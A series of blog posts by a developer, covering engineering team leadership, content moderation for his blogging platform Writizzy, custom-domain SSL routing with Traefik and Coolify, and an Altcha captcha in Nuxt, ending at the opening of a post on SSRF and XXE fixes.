I'm writing this chapter for any technical leader looking to create impact. To do this, we'll see that creating autonomy, creating alignment and knowing how to communicate context are levers for achieving it. Here, as a Tech Leader, you can be in two situations, but often both at the same time:

- the person seeking to develop his or her group's autonomy
- the person who belongs to a group with limited autonomy, and who is seeking to gain it.

To tackle this subject, I'm going to start from a drawing by Henrik Kniberg about alignment and empowerment, "empowered teams" being the teams in the top right-hand corner. This drawing is part of a keynote given in 2016 that I invite you to watch. The keynote is about a group whose goal is to cross a river to settle on the other bank.

The lower-left corner shows a group with little autonomy, no alignment and no precise directions. No one in this part of the quadrant has taken the initial problem of crossing the river personally. The symptoms of such an organization in a technological context:

- reaction-only teams, i.e. teams whose work is driven by support and bugs, upgrades to end-of-life components, and so on
- no hyper-clear objectives, but a kanban (a big todo list) that feeds itself organically
- micromanagement, with tasks assigned by a manager/project leader
- a technical team that works in isolation from users, often in supplier mode for a team that defines the product but is itself far from the business.

What can be done about it? It's a tough job in this part of the quadrant. Even before talking about autonomy, the first issue is to get people to agree on a common goal. The role of a tech leader is to get close to the business, or its closest representative, and understand the issues that need to be addressed. In this type of organization, the business is often far away and/or difficult to access. Breaking that distance can be hard, as it's not part of the company's culture. Technique and "best practices" are likely to be the least of your worries in this context; connecting Engineering to the business is paramount.

If we move to the right, we come across organizations made up of individuals or groups of individuals, each with defined objectives, but all of them different. If the group's objective is to cross a river, everyone is working on different things: some are growing vegetables, others are fishing, and a few leaders are wondering whether someone is working on crossing the river. There's a misunderstanding of autonomy here. Autonomy does not mean independence. A team that decides its priorities in its own corner doesn't make an impact, or does so by accident, and that success is hard to repeat. This doesn't mean individual groups can't be highly effective; unfortunately, impact is measured in global terms. The symptoms of such an organization in a technological context:

- several groups work on defined topics, but without collaboration with other teams
- a large number of projects are underway, stretching out over months. This is linked to the "one-man army" phenomenon: a single person can move fast, but ends up burning out faster than a larger group. This slowness wears teams down, as new subjects keep piling on top of the list
- the multiplicity of topics creates vagueness throughout the organization, which becomes a black box for the rest of the company
- the perceived impact is low.

What can be done about it? The observation is fairly similar to the previous one, but the work will be less arduous thanks to the highly entrepreneurial nature of the company. Here, the tech leader can rely on committed teams. We'll need to work on alignment. But let's define this notion a little better.

Alignment defines the ability of a group to all seek solutions to the same problem. Objective: a European company decides to enter the US market. Each team will seek to contribute to the same objective:

- The sales department will invest to open a sales office in the USA.
- The finance department will open a subsidiary in the USA and modify its invoicing model to comply with current regulations.
- The engineering department will study how to reduce product latency through a better geographical distribution of its infrastructure.

However, in the drawing's upper-left corner, we see clear alignment without autonomy. One or more leaders decide exactly what needs to be done to achieve an objective: the leader explicitly asks to build a bridge across the river. This mode of operation can be very effective, especially on a small scale with a visionary leader. But scaling up causes problems, as the visionary leader can't spread out across the company and follow every decision. On several occasions, I've observed companies with very good leaders who had great difficulty managing rapid growth. They recruited people more junior than themselves, more capable of carrying out a task than of making decisions, and those people then failed to step up in the time available. Symptoms of such an organization in a technological context:

- the leader is the most experienced member of the group, with a significant gap between them
- there is a strong imbalance between junior and senior staff, to the detriment of the latter
- the team is not involved in decision-making, and the backlog is fed by a single person.

What to do about it? If you're a tech leader, one of your responsibilities is recruitment. You have to recruit people who are better than you in certain areas. You have to learn to share your legos. The second important thing is to get out of the vicious circle:

1. The people I work with don't make the right decisions, or don't know how to make decisions, so I step in to make them for them.
2. For the sake of speed, I don't spend much time on explanation.
3. The people in question end up concentrating more on their expertise than on decision-making.

At stage 2, you have a major responsibility for coaching/mentoring, to educate and provide the context needed for more effective decision-making. If you're a tech leader in a situation where work is delegated to you, you'll need to show that the team can be autonomous. To do this, two things are important:

- Develop your business understanding. You need to step outside the team to better understand the challenges and constraints of the company and/or your customers.
- Develop your decision-making skills.

In our example above, a group that chose to build a catapult to hurl individuals to the other side would be showing a certain lack of understanding of the effect of gravity on human bodies :) Hopefully, the initiative would be stopped. Don't be the one to suggest the catapult.

To re-establish the symmetry of exchanges with your management, keep one thing in mind: provide more solutions than problems. You won't be trusted if you only come up with problems to solve, and your discussions will systematically turn into basic reporting. So you'll have to make choices.

- Bad: there are too few of us in the team, so we can't finish the project on time.
- Good: given the size of our team and our current speed, I've decided to cut back on some of the functionalities to meet the deadline.
- Bad: we're drowning in support; the team can't deliver project A on time.
- Good: we carried out a support analysis and noted a sharp increase in support cases linked to a bug in a recent feature. We decided to assign one person for a week to fix this bug and regain velocity on project A.

Before I talk about the last quadrant, I need to talk a little about "context". "Lead with context, not control" is a quote you'll find in the excellent book No Rules Rules by Erin Meyer and Reed Hastings. For a person or a group to make a good decision, they need to know the whole context. If we go back to our group that has to cross a river, we lack the context to propose initiatives. Maybe we have to cross the river to find food; in which case, why didn't we decide to settle on this side? The leader failed to mention that we're in the territory of another tribe, which has asked us to leave before autumn. Okay, and if the leader had told us that this tribe wasn't against trading with us after all, a bridge would probably be more interesting in the future than just a boat.

Having the context allows you to make the right decisions. And in the corporate world, there are plenty of occasions when you neglect to give the full context: sometimes for the sake of speed, sometimes to protect your team, sometimes because you've forgotten. But without context, you can't expect people to make the right decisions. Context gives you the constraints that enable you to propose the most appropriate technological solution.

In this corner of the quadrant, the objective is clearly defined, such as crossing the river. The constraints are known, and each group is invited to contribute to the common goal. In theory, this is the most efficient type of organization, especially at scale.

I'd like to point out two pitfalls at this stage. The first: it doesn't make sense to hire smart people and tell them what to do; we hire smart people so they can tell us what to do. You have to accept the unexpected, accept that the solutions that emerge may not be the ones you originally imagined. If a group suggests crossing the river with a boat or a tunnel, or has spotted a ford a hundred meters downstream, it may be different from what you had in mind, but it may be more effective. Accept that not everything will be as you pictured it.

BUT, the second: if there are several groups working — one on a tunnel, another on a bridge, another on a boat — you've got a problem. If everyone is working on the same problem with different solutions, that's also a form of misalignment. Again, autonomy doesn't mean independence, and there needs to be regular discussion around the initiatives launched to ensure overall coherence. Don't be the one working on a tunnel while everyone else is trying to build a bridge.

Certain methodologies, such as OKRs, help materialize this periodic discussion. Objective: the product should enable the acquisition of 10,000 prospects in the USA.

Quarter 1 initiatives:

- Team A works on improving SEO through multi-domain management and regionalization.
- Team B sets up several new domain names for multi-domain management.
- Team C works on SEA to refine geographic targeting of campaigns.

Quarter 2 initiatives:

- Team A works on a sponsorship program.
- Team B works on sharing mechanisms on social networks.
- Team C works on affiliation mechanisms.

The process runs in three steps:

- The objective is defined in advance.
- Teams propose initiatives to contribute to it.
- After discussion, a set of initiatives is chosen.

The coherence of the initiatives comes from a discussion at the beginning of the quarter about what each group proposes to contribute to the initial lead-acquisition objective. This step, designed to ensure the coherence of initiatives, can be found in many methodologies:

- in OKR, via the OKR quarterly review
- fixing appetites in the ShapeUp method
- the construction of "bet boards" by Henrik Kniberg
- Program Increment Planning in SAFe.

I must stress once again that autonomy does not mean independence. If, during these discussions, a decision is made to favor one bet, and it's not the solution you had in mind, too bad: you have to commit to the decision. This is the famous "disagree and commit". And it doesn't take anything away from team autonomy. Teams can be the driving force behind initiatives to solve a given problem, but in the end, we'll be looking for alignment. Otherwise, we're back in the bottom-right quadrant.

If your aim is to create more autonomous product teams, you may come up against the following difficulties:

- recruitment. To get started, you need very good PMs and Tech Leaders who have an entrepreneurial mindset as well as a technical one. Transformation is all about people.
- top management buy-in and a change of mindset are essential. They must agree to delegate the "how" to product teams, and focus on the "what" (objectives). And that's a lot harder than it sounds. Many say they want to move to autonomous product teams, but are very frustrated at not being able to tell them what to do.
- agreeing to abandon traditional roadmaps in favor of strategies based on objectives (OKR or other, it doesn't matter).

These three subjects create deadlocks. A good PM and/or Tech Leader will be reluctant to join an organization where they feel a lack of autonomy. Management will find it hard to trust a team that they don't feel is business-oriented enough. Top management who don't trust a team will continue to demand a high degree of predictability in development via detailed roadmaps.

As a Tech Leader, you have your hands on several levers that I've already covered in the first chapters:

- Develop your understanding of the business
- Measuring everything
- Know how to prioritize
- Create time for ideation
- Know how to communicate

The aim of all these actions is to increase the trust placed in Engineering's actions. This trust will be transformed into delegated autonomy.

Would you say that you have all the constraints in mind for your current projects? How much time do you spend explaining the context to the people who work with you? What is your team/department's objective for the year? How are you contributing to this objective this quarter?

References:

- Give away your legos and other commandments for scaling startups
- No Rules Rules
- Keynote from Henrik Kniberg in 2016
- Empowered by Marty Cagan

Hugo 2 months ago

Is Platform Moderation Doomed to Fail?

I've recently been building a blogging platform, writizzy.com, with the ambition of offering a European alternative to US platforms like Medium, Substack, Hashnode, and others. Now you might be thinking, "Aren't blogs kind of dead since YouTube, TikTok, Instagram came along?" I don't think so, but I'll get back to that.

However, blogs do have one major weakness compared to all those platforms: discoverability. What makes these platforms successful is... their content recommendation algorithms. Yes, I know—that's also what we criticize them for. But without algorithms, nobody would ever discover Mike's video about his passion for ant-keeping. And that might be a shame. The thing is, recommendation comes with platform responsibility for suggested content, which means moderation. And so far, no platform has nailed this. Between YouTube's puritanical overzealousness, X's normalization of conspiracy theories, and Shein selling questionable products, it's clear this problem is far from solved. So what do we do? Is it doomed to fail?

In this post, I'll cover the health of blogs, why discoverability matters, different approaches to discovery, content recommendation platforms, and moderation. Fair warning: I don't have all the answers—I'm actively working through this myself. But that's exactly why I'd love to discuss it.

Surprise: blogs are actually thriving. According to OptinMonster, there are over 600 million blogs worldwide. More than 409 million people read over 20 billion pages monthly on wordpress.com alone, with WordPress still powering 40% of all websites. Another source claims that 83% of internet users (4.4 billion people) regularly read blog posts. So blogging is very much alive, though there's definitely been a shift toward video consumption. Today, 82% of global internet traffic is video, and many people now turn to TikTok, Instagram, and similar platforms for quick answers—whether it's recipes, DIY tutorials, or even tech topics.
That said, written content has clear advantages: it's easier to create and update. I do both—videos and blog posts. Writing is obviously much faster than producing a video, plus I can update an article after publishing, which I can't do with a video. That's a significant advantage for people who don't have the energy to film themselves, or simply don't want to show their face. Yes, video will keep dominating entertainment and "brain off" moments, but blogs will remain more accessible and better suited for specialized, easily-updated content. However—and this is where video platforms win—the big difference is content recommendation. And that's what makes the blog model fragile.

Discoverability is a broad topic, because the first question is: does it even matter when you're writing a blog? For some, the answer is clearly yes—people who've built media outlets, paid newsletters, and monetize their traffic. Examples: Pragmatic Engineer, Ali Abdaal. At the other end of the spectrum, it's purely personal—a journal where whatever happens, happens. Discoverability might even be actively discouraged, like n.survol.fr which publishes no sitemap and makes site exploration intentionally difficult. And between these extremes lies a whole spectrum: people working on personal branding (so 2010s), others using blogs for influence, weekend hobbyist bloggers, etc.

I'm somewhere in that gray zone. I don't monetize my blog, which I've been running since 2001, but I'll admit I'd find it a bit sad if nobody read it. So I pay attention. Even though I use it as a kind of personal digital memory, my original motivation back in the early 2000s was sharing tutorials and experiences. And if absolutely nobody reads them, I'd probably put in less effort. That's precisely why I added YouTube videos a year ago—to scale up. I understand this isn't everyone's goal, but personally, I'm trying to have an impact—at my own scale—on understanding tech topics and their influence on business and society.
I'm not selling anything; I'm trying to contribute something. Here's the thing: when I post a YouTube video, I average several thousand views, with my personal best at 35K so far. (For example: as I write this, I published a video this morning and it already has 3.6K views in under 7 hours.) On the blog, views range from 50 to 12,000, with most posts hovering around 1K. And that's for an established blog with decent domain authority and reasonable SEO—these aren't even bad numbers. Again, maybe some people are totally against tracking these "vanity metrics," but I won't pretend I'm not competitive, and I'd bet some blogs would be more active if they were more widely read.

When content isn't read, it's not necessarily because it's bad—it's because it's hard to find. Without active promotion, nobody reads a blog post. SEO for individual bloggers is a nearly lost battle against platforms and professional sites with better authority or marketing budgets. That's why 90% of bloggers use social media to promote their posts. And naturally, while building Writizzy, I'm wondering: what if we could do better? What if we could enable content discovery through a community of readers?

This is exactly where platforms come in. Instagram, YouTube, TikTok, X—they all work the same way. They create personalized content feeds, trying to maximize time spent on the platform by continuously serving content tailored to each user. The idea is to leverage content produced by all users to determine the right audience for any new video. When I publish on YouTube, I make zero promotional effort—YouTube handles it. It identifies the right audience, shows them the video, measures reactions (clicks, watch time, likes, comments, etc.), validates the audience, and repeats. That's what we call an algorithm. But these algorithms have plenty of flaws.
They can be optimized to favor negative engagement (like X, which amplifies controversial content), or even favor certain political viewpoints (X again, implicated in several recent election interference cases). They're also criticized for creating filter bubbles that trap us in belief patterns—though I'd argue our own confirmation biases already do that on their own. They can also lock us into infinite scrolling, rewarded by small dopamine hits, while we passively accept ads scattered throughout. Yes, algorithms have a bad reputation, but in practice, they're the main reason we stay on these platforms. They let us discover available content, and for creators, they're what prevents total anonymity. If I'm convinced discoverability matters for blogs, one question emerges: how do we give control back to users?

Before going further, I should note that not all algorithms are opaque and complex. There are "lightweight" alternatives, like Hacker News, which ranks purely by vote count and freshness. Bearblog uses the same approach, and displays its ranking formula at the bottom of the page. Other solutions offer simple chronological sorting. That's Mastodon's approach—posts sorted purely by date. I find this too minimalist.

What really interests me is whether there's a virtuous approach. How do we preserve recommendation quality without imposing unilateral choices? This is exactly what this blog post addresses, making an important observation:

> You can pay money and advertise to women of color between 40–60 in Seattle, but you can't choose to read perspectives from those women

The post highlights a solution, an MIT research project: Gobo (unfortunately inactive as I write this), which lets you aggregate data from platforms and apply your own filters. Similar projects include Youchoose and Tournesol, all sharing the same goal: empowering users.
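The vote-and-freshness ranking mentioned above (Hacker News style) is commonly described by HN's published "gravity" formula; here's a minimal sketch, with approximate constants:

```typescript
// Hacker News-style ranking: votes decayed by age.
// score = (votes - 1) / (ageHours + 2)^gravity, gravity ≈ 1.8.
// Higher gravity makes older posts sink faster.
function rankScore(votes: number, ageHours: number, gravity = 1.8): number {
  return (votes - 1) / Math.pow(ageHours + 2, gravity);
}
```

At equal votes, a 1-hour-old post outranks a 24-hour-old one, and the submitter's own vote is discounted, so a post with a single vote scores zero.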
While these initiatives remain niche, the most polished and widely used implementation is probably Bluesky, which lets anyone choose algorithms that can be created by other users. If I were to build a content recommendation system for Writizzy, this would be the approach that appeals to me most. However, discussing this with Thomas (who also works on Writizzy), offering a content feed quickly raises two other problems:

- How do you start with only 140 users, of which maybe 10-15% are truly active? This is called the Cold Start problem.
- Moderation.

I'll skip the first topic—it's not what this post is about. But the second is serious. The moment you create a page aggregating content from multiple users, the risk of inappropriate content exists. It could be adult content, spam, scams, racist abuse, etc. Writizzy already has responsibilities under the European DSA (Digital Services Act). I must provide a reporting mechanism and act on reports of illegal content. Note: as a host, I'm not required to proactively monitor—only to respond to reports. As long as blogs remain separate, it's still manageable. Impact is limited to the individual's blog. But once a feed exists, impact multiplies—that's the whole point—but it also creates more pressure on moderation.

And it's far from simple, because you have to judge whether content is illegal, and that judgment isn't always clear-cut. What's acceptable varies. Where's the line between satire and insult? Between political criticism and defamation? How do you detect and handle fake news? What's the line between pornographic nudity and art (Courbet's *L'Origine du monde*, for instance)?

I've tried to catalog different moderation methods to see what might work for Writizzy.

**Human moderation.** Two main categories here: manual moderation by one or more super-admins, and mass outsourced moderation. Small-scale manual moderation is what you see on Mastodon, with the obvious bias of moderator subjectivity and resulting conflicts between instances with different political positions. I'm not infallible; I don't want to be responsible for moderating all published content. And it won't scale. Then there's mass moderation, often outsourced to low-wage countries by major platforms like Meta, TikTok, or OpenAI. It's far from pleasant work, and abuses have been documented extensively. It's unsuitable for Writizzy—economically and ethically.

**Community moderation.** This relies mainly on user reports. X's Community Notes fall into this category, as do Wikipedia's discussion threads. It's obviously the cheapest approach, but it can be gamed if groups coordinate to censor content. This system can be improved with reputation points awarded by the community. That's Reddit and Hacker News Karma, or Stack Overflow reputation scores. This mechanism could make sense for Writizzy. However, community moderation is reactive—meaning the damage is done; content has already been exposed before being flagged.

**Automated moderation.** This can involve keyword detection, user profiling (new accounts, posting patterns, etc.), or nudity detection algorithms for images. It's the easiest method to implement. You can adjust tolerance levels. This is where AI could shine for understanding text, but it's far from foolproof—people use word substitutions, altered spelling, emojis representing concepts, or algorithms simply perform worse in certain languages.

My conclusion from this mini-study is fairly obvious: you'd need automated detection upfront, then a reporting system enhanced by Karma scores downstream, and finally manual super-admin intervention as a last resort. Yet these systems exist and platforms are still criticized, because all moderation is imperfect. There's always the central question of interpretation: what's legal or not? And that interpretation varies by country and culture.

This brings us to another approach—Bluesky's again—where one of the fundamental principles is decentralization, including moderation via labelers. Bluesky's moderation has two levels:

- Base moderation, handled by Bluesky itself. This first layer uses Ozone, an open-source moderation tool. It's configurable so users can set their own tolerance levels. This step catches universally unacceptable content (child abuse, incitement to violence, etc.) for which the platform can be held legally responsible.
- Optional moderation provided by independent labelers. These labelers can be built with an SDK and offered to users who choose them to customize their expected moderation.

Once again, it comes back to the same idea: giving users control. (Even if 90% will probably keep the default settings.)

What's certain is that this topic is complex, and I completely understand Thomas's reluctance to venture into it. So we discussed other approaches. Rather than aggregating content, we could start with content curation. It's much simpler—we could manually select content to highlight each week or month. We could also consider smaller-scale recommendations:

- Related content suggestions at the bottom of articles
- Similar newsletter suggestions when users subscribe

Or we could focus on automating cross-posting: RSS and newsletters today, automatic distribution to ATProto, Bluesky, Nostr tomorrow? There are other possibilities, and no decisions have been made yet.

What would you do? If discoverability matters to you, what would be your ideal solution? Do you use Medium's or dev.to's recommendations? Are you already cross-posting to federated networks?
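To make the "automated detection upfront" layer of that conclusion concrete, here is a deliberately tiny TypeScript sketch of a keyword pre-filter that flags a post for review before it reaches any aggregated feed. Everything here (function name, term list) is hypothetical; a real system would load maintained lists per language and combine this signal with account age, posting patterns, and image checks.

```typescript
// Hypothetical first-layer filter: block nothing, just flag for human review.
// The inline term list is illustrative only; production systems would load
// maintained, per-language lists and refresh them regularly.
const flaggedTerms: string[] = ["free crypto", "miracle cure"];

export function needsReview(post: string): boolean {
  // Case-insensitive substring match — crude on purpose; it's only a
  // cheap upstream signal, not a verdict.
  const normalized = post.toLowerCase();
  return flaggedTerms.some((term) => normalized.includes(term));
}
```

The point of flagging rather than blocking is to keep false positives cheap: a flagged post waits in a review queue (possibly Karma-weighted), it isn't silently censored.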

Hugo 2 months ago

Managing Custom Domains and Dynamic SSL with Coolify and Traefik

I recently published an article on [managing SSL certificates for a multi-tenant application on Coolify](https://eventuallymaking.io/p/2025-10-coolify-wildcard-ssl). The title might sound intimidating, but basically it lets an application handle tons of subdomains (over HTTPS) dynamically for its users. For example:

- `https://hugo.writizzy.com`
- `https://thomas-sanlis.writizzy.com`

That's a solid foundation, but users often want more: **custom domains**. The ability to use their own address, like:

- `https://eventuallymaking.io`
- `https://thomas-sanlis.com`

So let's dive into how to manage custom domains for a multi-tenant app with dynamic SSL certificates. *(I feel like I'm going for the world record in longest blog post title!)*

## Custom Domains

The first step for a custom domain is routing traffic from that (sub)domain to your application (Writizzy in my case). It all comes down to **DNS records** on the user's side. Only they can configure their domain to point to your application's subdomain. They have several options: **CNAME**, **ALIAS**, or **A** records.

### 1. CNAME (the simplest)

A CNAME is an alias for another domain. It basically says that `www.eventuallymaking.io` is an alias for `hugo.writizzy.com`. All traffic trying to resolve the `www` address gets automatically forwarded to your application domain.

**Major limitation:** You can't use a CNAME for a root domain (e.g., `eventuallymaking.io` without the `www`). Adding a CNAME on an apex domain would conflict with other records (A, MX, TXT, etc.).

### 2. ALIAS

Some DNS providers offer **ALIAS** records (or *CNAME flattening*). It's essentially a CNAME that can coexist with other records on a root domain. Great option if the user's provider supports it (OVH doesn't, for instance).

### 3. A Record

Here, the user directly enters Writizzy's server IP address.

**Warning:** This approach is risky.
If you change servers (and therefore IPs), all your users' custom domains break until they update their config. To use this method safely, you need a **floating IP** that can be reassigned to your new server or web frontend.

Alright, that's a good start, but if we stop here, things won't work well—the site won't serve over HTTPS.

## HTTPS on Custom Domains

In my previous post, I showed how Traefik could route all traffic hitting `*.writizzy.com` subdomains to the same application using these lines:

```yaml
traefik.http.routers.https-custom.rule=HostRegexp(`^.+$`)
traefik.http.routers.https-custom.entryPoints=https
traefik.http.routers.https-custom.service=https-0-zgwokkcwwcwgcc4gck440o88
traefik.http.routers.https-custom.tls.certresolver=letsencrypt
traefik.http.routers.https-custom.tls=true
traefik.http.routers.https-custom.priority=1
```

Since the regex catches everything, you might think SSL would just follow along. Unfortunately, no. Traefik knows it needs to handle a wildcard certificate for `*.writizzy.com`, but it has no clue about the external domains it'll need to serve. We need to help it by dynamically providing the list of custom domains. Our constraints:

- Obviously, no application restart
- We want to drive it programmatically

### Dynamic Traefik Configuration with File Providers

This is where Traefik's [File Providers](https://doc.traefik.io/traefik/reference/install-configuration/providers/others/file/) come in. In Coolify, this feature is enabled by default via [dynamic configurations](https://coolify.io/docs/knowledge-base/proxy/traefik/dynamic-config). Under the hood, Traefik watches a specific directory:

```bash
- '--providers.file.directory=/traefik/dynamic/'
- '--providers.file.watch=true'
```

Drop a `.yml` file defining the rule for a new domain, and Traefik picks it up on the fly and triggers the HTTP challenge with Let's Encrypt to get the SSL certificate.
**Example dynamic configuration:**

```yaml
http:
  routers:
    eventuallymaking-https:
      rule: "Host(`eventuallymaking.io`)"
      entryPoints:
        - https
      service: https-0-writizzy
      tls:
        certResolver: letsencrypt
      priority: 10
    eventuallymaking-http:
      rule: "Host(`eventuallymaking.io`)"
      entryPoints:
        - http
      middlewares:
        - redirect-to-https@docker
      service: https-0-writizzy
      priority: 10
```

So with this approach, we've solved our first constraint: no restart needed to configure a new custom domain. Now let's tackle the second one and make it programmatic.

### Automation via the Application

The idea is straightforward: the application creates these files directly in the directory Traefik watches.

1. **Coolify configuration:** Go to `Configuration -> Persistent Storage` and add a `Directory mount` to make the `/traefik/dynamic/` directory visible to your application container. ![directory mount](https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1765961966661-wymdzej.png)
2. **Code (Kotlin in my case):** The application generates a file based on the template above as soon as a user configures their domain.

> **Important note on timing:** If you create the Traefik config before the user has pointed their domain to your IP, the SSL challenge will fail. Traefik will automatically retry (with backoff), but it can take a while. Ideally, validate the DNS pointing (via a background job) **before** generating the file.

> **Important note on security:** The generated file contains user input (the domain name). It's crucial to sanitize and validate this data to prevent a malicious user from injecting arbitrary Traefik directives into your configuration.

## Wrapping Up

This post wraps up what I hope has been a useful series for SaaS builders running multi-tenant apps on Coolify. We've covered:

1. [Tenant management (Nuxt) and basic Traefik configuration](https://eventuallymaking.io/p/2025-10-coolify-subdomain)
2.
[SSL management with dynamic subdomains](https://eventuallymaking.io/p/2025-10-coolify-wildcard-ssl)
3. **Custom domains with SSL** (this post)

You might wonder if this solution scales with tens of thousands of sites all using custom domains—specifically whether Traefik can handle monitoring that many files in a directory. I don't have the answer yet. Writizzy is nowhere near that scale for now. There might be other solutions, like using Caddy instead of Traefik in Coolify, but it's way too early to explore that.
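As an appendix to the automation step above: the actual implementation is Kotlin, but the file-generation idea fits in a few lines of any language. Here is a hypothetical TypeScript sketch (all names illustrative, including the service identifier) that validates the user-supplied domain before rendering the dynamic config, per the security note above:

```typescript
import { writeFileSync } from "node:fs";

// Hypothetical sketch (the real implementation is Kotlin): validate the
// user-supplied domain, render a Traefik dynamic-config file, and drop it
// into the directory Traefik watches.
const DOMAIN_RE = /^(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))+$/;

export function renderTraefikConfig(domain: string, service: string): string {
  // Strict validation: rejecting anything but a plain hostname prevents a
  // user from injecting arbitrary Traefik directives into the YAML.
  if (!DOMAIN_RE.test(domain)) throw new Error(`Invalid domain: ${domain}`);
  return [
    "http:",
    "  routers:",
    `    ${domain.replace(/\./g, "-")}-https:`,
    `      rule: "Host(\`${domain}\`)"`,
    "      entryPoints:",
    "        - https",
    `      service: ${service}`,
    "      tls:",
    "        certResolver: letsencrypt",
    "      priority: 10",
    "",
  ].join("\n");
}

export function writeCustomDomainConfig(domain: string, service: string): void {
  // Traefik's file provider picks this up without a restart.
  writeFileSync(`/traefik/dynamic/${domain}.yml`, renderTraefikConfig(domain, service));
}
```

Rendering from a fixed line template (rather than interpolating user input into free-form YAML) keeps the attack surface down to the domain string itself, which the regex constrains.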

Hugo 2 months ago

Implementing a tracking-free captcha with Altcha and Nuxt

For the past few days, I've noticed several suspicious uses of my contact form. Looking closer, I noticed that each contact form submission was followed by a user signup with the same email and a name that always followed the same pattern: qSfDMiWAiLnpYYzdCeCWd, fePXzKXbAmiLAweNZ, etc. Let's just say their membership in the human species seems particularly dubious. Anyway, it's probably time to add some controls, and one of the most famous is the captcha.

## Next-generation captchas

Everyone knows captchas – they're annoying, probably on par with cookie consent banners. Nowadays we see captchas where you have to identify traffic lights, solve additions, drag a puzzle piece to the right spot, and so on. But you may have noticed that lately we're also seeing simple forms with a checkbox: "I am not a robot". ![I'm not a robot](https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1764749254941-124yicj.jpg)

Sometimes the captcha isn't even visible anymore, with detection happening without asking you anything. So how does it work? And how can I add it to my application?

## Nuxt Turnstile, the default solution with Nuxt

In the Nuxt ecosystem, the most common solution is [Nuxt Turnstile](https://nuxt.com/modules/turnstile). The documentation is pretty clear on how to add it. It's a great solution, but it relies on Cloudflare Turnstile, and I'm trying to use only European products for Writizzy and Hakanai. Still, the documentation helps understand a bit better how next-generation captchas work. When the page loads, the Turnstile widget performs client-side checks:

- **Proof of space:** The script asks the client to generate and store an amount of data according to a predefined algorithm, then asks for the byte at a given position. Not only does this take time, but it's difficult to automate at scale.
- **Trivial browser detections:** The idea is to try to detect a bot (no plugins, webdriver control, etc.).
Fingerprinting also helps in this case. It collects all available info about the browser, OS, available APIs, resolution, etc. Note that fingerprinting can be frowned upon by GDPR, which may consider it as uniquely identifying a person. Personally, I find that debatable, but in the context of anti-spam protection, we're kind of chasing our own tail, since we'd have to ask bots for permission before trying to detect them. We're at the limits of absurdity here. But let's continue.

The script then sends all this info to Cloudflare, which, relying on a huge database of worldwide traffic, calculates a percentage chance that the user is a bot. The form will vary between:

- nothing to do, Cloudflare is convinced it's a human
- a checkbox "I am not a robot"
- a more elaborate captcha if the suspicion is really strong
- a blocking page when there's no doubt about the suspicion

Now, you might say, the checkbox is a bit light, isn't it? If I've gotten this far, I can easily automate a click on a checkbox. Especially since Cloudflare is everywhere, it's necessarily the same form everywhere. Yes... But... First, the way you check the box will be analyzed. Is the click too fast, does it seem automated, is the mouse path to reach the box natural? All this can trigger additional protection.

*EDIT: Turnstile might not do this operation. reCAPTCHA, Google's solution, is known for doing it. Turnstile is less explicit on the subject.*

But on top of that, the checkbox triggers a challenge, a small calculation requested by Cloudflare that your client must perform. The result is what we call a **proof of work**. This work is slow for a computer. We're talking about 500ms, an eternity for a machine. For a human user, it's totally anecdotal. And the satisfaction of having proven their humanity makes you forget those 500 little milliseconds.
On the other hand, for a bot, this time will be a real problem if it needs to automate the creation of hundreds or thousands of accounts. So it's not impossible to check this box, but it's costly. And it's supposed to make the economic equation uninteresting at high volumes. Now, even though all this is nice, I still don't want to use Cloudflare, so how do I replace it?

## Altcha, an open-source alternative

During my research, I came across [altcha](https://altcha.org/). The solution is open source, requires no calls to external servers, and shares no data. The implementation requires generating the proof-of-work challenge (the famous JavaScript challenge) on your server. Here we'll initiate it from the Nuxt backend, in a handler:

```typescript
// server/api/altcha/challenge.get.ts
import { createChallenge } from 'altcha-lib'

export default defineEventHandler(async () => {
  const hmacKey = useRuntimeConfig().altchaHmacKey as string
  return createChallenge({
    hmacKey,
    maxnumber: 100000,
    expires: new Date(Date.now() + 60000) // 1 minute
  })
})
```

In the contact form page, we'll add a Vue component:

```vue
```

This `altchaPayload` will be added to the post payload, for example:

```typescript
await $fetch('/api/contact', {
  method: 'POST',
  body: {
    email: loggedIn.value ? user.value?.email : event.data.email,
    subject: event.data.subject,
    message: event.data.message,
    altcha: altchaPayload.value
  }
})
```

The calculation result will then be verified in the `/api/contact` endpoint:

```typescript
const hmacKey = useRuntimeConfig().altchaHmacKey as string
const ok = await verifySolution(data.altcha, hmacKey)
if (!ok) {
  throw createError({ statusCode: 400, message: 'Invalid challenge' })
}
```

The Vue component I mentioned earlier is this one:

```vue
```

And there you go, the [contact page](https://pulse.hakanai.io/contact) and the [signup page](https://pulse.hakanai.io/signup) are now protected by this altcha. Now, does it work?
## Altcha's limitations

The implementation was done yesterday. And unfortunately, I'm still seeing very suspicious signups on Pulse. So clearly, Altcha didn't do its job. However, now that we know how it works, it's easier to understand why it doesn't work. Altcha doesn't do any of the checks that Turnstile does:

- no proof of space
- no fingerprinting
- no fingerprint verification with Cloudflare
- no behavioral verification of the mouse click on the checkbox

The only protection is the proof of work, which only costs the attacker time. Now for Pulse, for reasons I don't understand, the person having fun creating accounts makes about 4 per day. The cost of the proof of work is negligible in this case. So Altcha is not suited for this type of "slow attack". Anyway, I'll have to find another workaround... And I'm open to your suggestions.
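As a footnote on the economics: here is a toy proof-of-work in TypeScript, loosely in the spirit of Altcha's challenge but simplified for illustration (this is not its exact protocol, and all names are hypothetical). The server keeps a secret number and publishes only a salt plus the hash of salt + number; the client must brute-force the number.

```typescript
import { createHash } from "node:crypto";

// Toy proof-of-work (a simplification for illustration, not Altcha's exact
// protocol): the server publishes { salt, challenge } and keeps the secret
// number to itself; the client brute-forces the number.
const sha256 = (s: string): string =>
  createHash("sha256").update(s).digest("hex");

export function createToyChallenge(salt: string, secret: number) {
  return { salt, challenge: sha256(salt + secret) };
}

export function solveToyChallenge(
  salt: string,
  challenge: string,
  maxNumber = 100_000
): number | null {
  // The solver's cost scales with maxNumber — that's the whole defense.
  for (let n = 0; n <= maxNumber; n++) {
    if (sha256(salt + n) === challenge) return n;
  }
  return null; // no solution within bounds (expired or bogus challenge)
}
```

Raising `maxNumber` raises the average solving cost, and that is the only knob this mechanism offers — which is exactly why it does nothing against an attacker content to create four accounts a day.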

Hugo 3 months ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message:

